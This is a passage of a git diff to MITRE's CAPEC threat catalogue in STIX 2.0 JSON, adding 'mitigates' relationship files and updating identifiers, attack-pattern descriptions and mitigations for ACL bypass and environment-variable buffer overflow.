0000000000..ea33ad8d17 --- /dev/null +++ b/capec/relationship/relationship--fad1edac-f0a5-48d7-b651-4d1eb2869a8c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e4a8c429-2539-4e4f-a738-e13a4889e287", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fad1edac-f0a5-48d7-b651-4d1eb2869a8c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4a7dea4-6d70-49b0-8dd2-0e5ca7026726", + "target_ref": "attack-pattern--91d858e1-b052-4ec0-a3a4-da9a6b3dfb9f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fafda083-84e0-40e7-8e6d-dd060d98f9a0.json b/capec/relationship/relationship--fafda083-84e0-40e7-8e6d-dd060d98f9a0.json new file mode 100644 index 0000000000..e3d19ab848 --- /dev/null +++ b/capec/relationship/relationship--fafda083-84e0-40e7-8e6d-dd060d98f9a0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e1d30fbb-7ceb-42d4-b1b6-79941c93cce7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fafda083-84e0-40e7-8e6d-dd060d98f9a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--94dd3656-25eb-479e-bf48-793ec541a05b", + "target_ref": "attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fb58982e-6527-4113-bd7c-61aa753ad5b1.json b/capec/relationship/relationship--fb58982e-6527-4113-bd7c-61aa753ad5b1.json new file mode 100644 index 0000000000..64553ecd42 --- /dev/null +++ b/capec/relationship/relationship--fb58982e-6527-4113-bd7c-61aa753ad5b1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--da7e18a7-0ba7-4346-98b0-eb6d4d82c9c1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fb58982e-6527-4113-bd7c-61aa753ad5b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c82b2ed1-695e-478b-a652-8378b54533ea", + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fb7a7520-3f18-4bee-b0cd-8e8bd6589311.json b/capec/relationship/relationship--fb7a7520-3f18-4bee-b0cd-8e8bd6589311.json new file mode 100644 index 0000000000..ee679bb6ac --- /dev/null +++ b/capec/relationship/relationship--fb7a7520-3f18-4bee-b0cd-8e8bd6589311.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--195e9e1a-0b6b-4563-b26e-de53e50157f6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fb7a7520-3f18-4bee-b0cd-8e8bd6589311", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0", + "target_ref": "attack-pattern--66a47ab4-8af8-4181-a318-6b7a6c979201", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fc5ddb13-a8bc-48f6-9bf0-d88a106a5170.json b/capec/relationship/relationship--fc5ddb13-a8bc-48f6-9bf0-d88a106a5170.json new file mode 100644 index 0000000000..e3fe4ea617 --- /dev/null +++ b/capec/relationship/relationship--fc5ddb13-a8bc-48f6-9bf0-d88a106a5170.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--01b7e1de-2b44-4531-b7be-ae01cb1e33bc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc5ddb13-a8bc-48f6-9bf0-d88a106a5170", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", + "target_ref": "attack-pattern--7fd466e3-0437-45f6-8cdc-0d9de4a4df92", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fc7c7cca-edd7-4b8f-9557-499a5368bd78.json b/capec/relationship/relationship--fc7c7cca-edd7-4b8f-9557-499a5368bd78.json new file mode 100644 index 0000000000..6120b51d09 --- /dev/null +++ b/capec/relationship/relationship--fc7c7cca-edd7-4b8f-9557-499a5368bd78.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--86166ff0-4864-4619-9417-a7c221b9ccef", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fc7c7cca-edd7-4b8f-9557-499a5368bd78", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f73dbc74-2a5d-4900-8d83-013fa581cb2c", + "target_ref": "attack-pattern--a486810c-f63e-4c74-8ff9-73051a1c1d28", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fcc957ee-8c3a-4698-b94d-30863757d021.json b/capec/relationship/relationship--fcc957ee-8c3a-4698-b94d-30863757d021.json new file mode 100644 index 0000000000..a22a3a8201 --- /dev/null +++ b/capec/relationship/relationship--fcc957ee-8c3a-4698-b94d-30863757d021.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6dcbe3cf-2cdb-43a7-9c2b-65ceb0fb079b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fcc957ee-8c3a-4698-b94d-30863757d021", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--780e2005-b29c-45e0-abad-0738f19408dd", + "target_ref": "attack-pattern--35abccd5-51c3-4107-9ff9-956e33d8a6a6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fd5b21d9-bbc6-4c2d-bcc2-1d828f360a86.json b/capec/relationship/relationship--fd5b21d9-bbc6-4c2d-bcc2-1d828f360a86.json new file mode 100644 index 0000000000..aee36dcbf0 --- /dev/null +++ b/capec/relationship/relationship--fd5b21d9-bbc6-4c2d-bcc2-1d828f360a86.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--57186a14-60a8-48b3-b093-23f65fe80d7b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fd5b21d9-bbc6-4c2d-bcc2-1d828f360a86", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1", + "target_ref": "attack-pattern--59634590-4269-4742-896f-27e5a8f3acc4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fdb93c2f-f884-40a4-89c2-5cf4510641f0.json b/capec/relationship/relationship--fdb93c2f-f884-40a4-89c2-5cf4510641f0.json new file mode 100644 index 0000000000..6bbe1a72f3 --- /dev/null +++ b/capec/relationship/relationship--fdb93c2f-f884-40a4-89c2-5cf4510641f0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--90221ebf-eff2-4ad5-9b8a-420aade68f63", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fdb93c2f-f884-40a4-89c2-5cf4510641f0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01", + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fea61934-d6b2-4519-87c4-ec48ad2536e2.json b/capec/relationship/relationship--fea61934-d6b2-4519-87c4-ec48ad2536e2.json new file mode 100644 index 0000000000..db147c5b96 --- /dev/null +++ b/capec/relationship/relationship--fea61934-d6b2-4519-87c4-ec48ad2536e2.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--78a62e57-6381-47c4-a68e-e6935cd1ce90", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fea61934-d6b2-4519-87c4-ec48ad2536e2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-04-15T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227", + "target_ref": "attack-pattern--488fb1b8-b703-42c6-a822-c0960ecff6fd", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--feb130f4-7a68-43cd-9a77-10d60e95475f.json b/capec/relationship/relationship--feb130f4-7a68-43cd-9a77-10d60e95475f.json new file mode 100644 index 0000000000..82c2a46a16 --- /dev/null +++ b/capec/relationship/relationship--feb130f4-7a68-43cd-9a77-10d60e95475f.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5b079c03-08b6-40bf-8ef0-26bda52fade6", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--feb130f4-7a68-43cd-9a77-10d60e95475f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a354d4f8-11d2-4af7-9657-f6898cc14b56", + "target_ref": "attack-pattern--47c67c9b-d65c-4eb8-ac6e-9c0de8c64ba3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fec84e5e-c761-451c-8652-d4fd2a29e922.json b/capec/relationship/relationship--fec84e5e-c761-451c-8652-d4fd2a29e922.json new file mode 100644 index 0000000000..c8ee1268d0 --- /dev/null +++ b/capec/relationship/relationship--fec84e5e-c761-451c-8652-d4fd2a29e922.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--41149928-9802-4043-ab42-a2f468218675", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fec84e5e-c761-451c-8652-d4fd2a29e922", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--4859301d-e5f0-40d1-b5ed-976929e27e94", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b.json b/capec/relationship/relationship--fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b.json new file mode 100644 index 0000000000..f17bb3b1da --- /dev/null +++ b/capec/relationship/relationship--fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3d47eb9f-8acd-4780-8839-c0f8456f30f0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fed76d01-7c49-48d9-8fa0-6fbdcd09ac9b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--95f18f82-c186-43df-937f-09ecf87853d6", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--feecba9f-ded0-410b-9f23-51c5b3b5dcae.json b/capec/relationship/relationship--feecba9f-ded0-410b-9f23-51c5b3b5dcae.json new file mode 100644 index 0000000000..9a208d211f --- /dev/null +++ b/capec/relationship/relationship--feecba9f-ded0-410b-9f23-51c5b3b5dcae.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bc8d00d2-a55d-49cd-862b-4e1c4cde4910", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--feecba9f-ded0-410b-9f23-51c5b3b5dcae", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877", + "target_ref": "attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ff9f1927-dbeb-401a-8f36-cfeebad3521d.json b/capec/relationship/relationship--ff9f1927-dbeb-401a-8f36-cfeebad3521d.json new file mode 100644 index 0000000000..64d96554fd --- /dev/null +++ b/capec/relationship/relationship--ff9f1927-dbeb-401a-8f36-cfeebad3521d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--9a8a9f61-2bef-46bb-b65f-4263f38174b2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ff9f1927-dbeb-401a-8f36-cfeebad3521d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9cfa2c31-7a94-4901-a207-fc47a31a873d", + "target_ref": "attack-pattern--555b8083-e5c3-458b-ab0b-e6a8e91ef149", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e.json b/capec/relationship/relationship--ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e.json new file mode 100644 index 0000000000..7d35225754 --- /dev/null +++ b/capec/relationship/relationship--ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--59d633c7-035a-4e66-9c5d-9378aae8acdb", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffdbbef1-9cc0-4d00-8cdb-0e437e9e149e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--cea57129-2096-4707-a328-617470bd4c96", + "target_ref": "attack-pattern--8f1bcb61-cdf4-41ff-a82a-df537363a9a5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ffe18c13-75af-4579-9329-168b3296cf71.json b/capec/relationship/relationship--ffe18c13-75af-4579-9329-168b3296cf71.json new file mode 100644 index 0000000000..91bf558243 --- /dev/null +++ b/capec/relationship/relationship--ffe18c13-75af-4579-9329-168b3296cf71.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1e300413-83c5-41f5-a572-38dfa8633a20", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ffe18c13-75af-4579-9329-168b3296cf71", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/stix-capec.json b/capec/stix-capec.json index 548ffdb457..cbe96b828b 100644 --- a/capec/stix-capec.json +++ b/capec/stix-capec.json @@ -6,26 +6,26 @@ "statement": "CAPEC is sponsored by US-CERT in the office of Cybersecurity and Communications at the U.S. Department of Homeland Security. Copyright \u00a9 2007 - 2017, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation." }, "type": "marking-definition", - "id": "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951", - "created": "2019-05-30T15:51:57.344498Z" + "id": "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89", + "created": "2019-10-10T18:24:35.927034Z" }, { "name": "The MITRE Corporation", "identity_class": "organization", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "identity", - "id": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", - "created": "2019-05-30T15:51:57.346Z", - "modified": "2019-05-30T15:51:57.346Z" + "id": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-10-10T18:24:35.929Z", + "modified": "2019-10-10T18:24:35.929Z" }, { "name": "Accessing Functionality Not Properly Constrained by ACLs", "description": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -95,40 +95,41 @@ "\n Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a \"Single front controller\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.\n If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a6fae19a-d6bd-42b3-9b22-9ce62e96c7c4" + "id": "attack-pattern--f2009992-b316-48ff-8d26-862971791ad3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "name": "coa-1-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "\n In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \"NoAccess\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.\n Having done so, any direct access to those protected Servlets will be prohibited by the web container.\n In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic.\n ", "type": "course-of-action", - "id": "course-of-action--98f828a6-2de5-4cba-b42a-52b6fdcc9481" + "id": "course-of-action--d32c1276-0d53-4aed-93c1-390329302d45" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b249c03d-2a13-4eff-9ec2-c5b7fcac120a", - "source_ref": "course-of-action--98f828a6-2de5-4cba-b42a-52b6fdcc9481", + "id": "relationship--d077bf67-717c-431d-8807-92f3e2097865", + "source_ref": "course-of-action--d32c1276-0d53-4aed-93c1-390329302d45", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a6fae19a-d6bd-42b3-9b22-9ce62e96c7c4" + "target_ref": "attack-pattern--f2009992-b316-48ff-8d26-862971791ad3" }, { "name": "Buffer Overflow via Environment Variables", "description": "This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -239,115 +240,116 @@ "\n Attack Example: Buffer Overflow in TERM\n A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable.See also: CVE-1999-0046" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e49b65ac-dfea-4a34-9671-e6a5c64d87b2" + "id": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-10-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not expose environment variable to the user.", "type": "course-of-action", - "id": "course-of-action--6a4829fc-c73a-4286-938e-037a8976638b" + "id": "course-of-action--81245812-a329-4abe-8817-6159641985fa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1fa710be-4d11-4526-8212-e666aebcc59d", - "source_ref": "course-of-action--6a4829fc-c73a-4286-938e-037a8976638b", + "id": "relationship--dd73c22b-5b7a-49c7-b1c0-26ea1711f627", + "source_ref": "course-of-action--81245812-a329-4abe-8817-6159641985fa", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e49b65ac-dfea-4a34-9671-e6a5c64d87b2" + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-10-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Do not use untrusted data in your environment variables.", "type": "course-of-action", - "id": "course-of-action--0b70e36c-da06-4709-829e-a4c368f9f4fa" + "id": "course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--6ca60210-eb66-43b9-883e-e797c85783bb", - "source_ref": "course-of-action--0b70e36c-da06-4709-829e-a4c368f9f4fa", + "id": "relationship--b3400a5a-bf24-45d1-942d-423db78369c8", + "source_ref": "course-of-action--d2b5aa10-ee2b-4e45-ba0e-3ef17369b50f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e49b65ac-dfea-4a34-9671-e6a5c64d87b2" + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-10-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use a language or compiler that performs automatic bounds checking", "type": "course-of-action", - "id": "course-of-action--ae7b8c98-60de-4777-8b89-6704bc9ec53f" + "id": "course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1024656b-261f-423f-9bf0-83860908acfe", - "source_ref": "course-of-action--ae7b8c98-60de-4777-8b89-6704bc9ec53f", + "id": "relationship--2d6b779f-9f4b-48c6-8122-a6f2bb2507c8", + "source_ref": "course-of-action--eb78da5d-7bd7-458a-93ba-a2f7c782a1af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--e49b65ac-dfea-4a34-9671-e6a5c64d87b2" + "target_ref": "attack-pattern--1a0c16aa-ba23-4997-a370-8a30c69f41c0" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-10-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.", "type": "course-of-action", - "id": "course-of-action--74bf199e-4108-4ba6-a0e9-235765f846fc" + "id": "course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b5116b29-04f3-4fcb-9a0a-d5fca0455820", - "source_ref": "course-of-action--74bf199e-4108-4ba6-a0e9-235765f846fc", + "id": "relationship--49eaee57-6195-456a-8340-de94e718e22a", + "source_ref": "course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f", 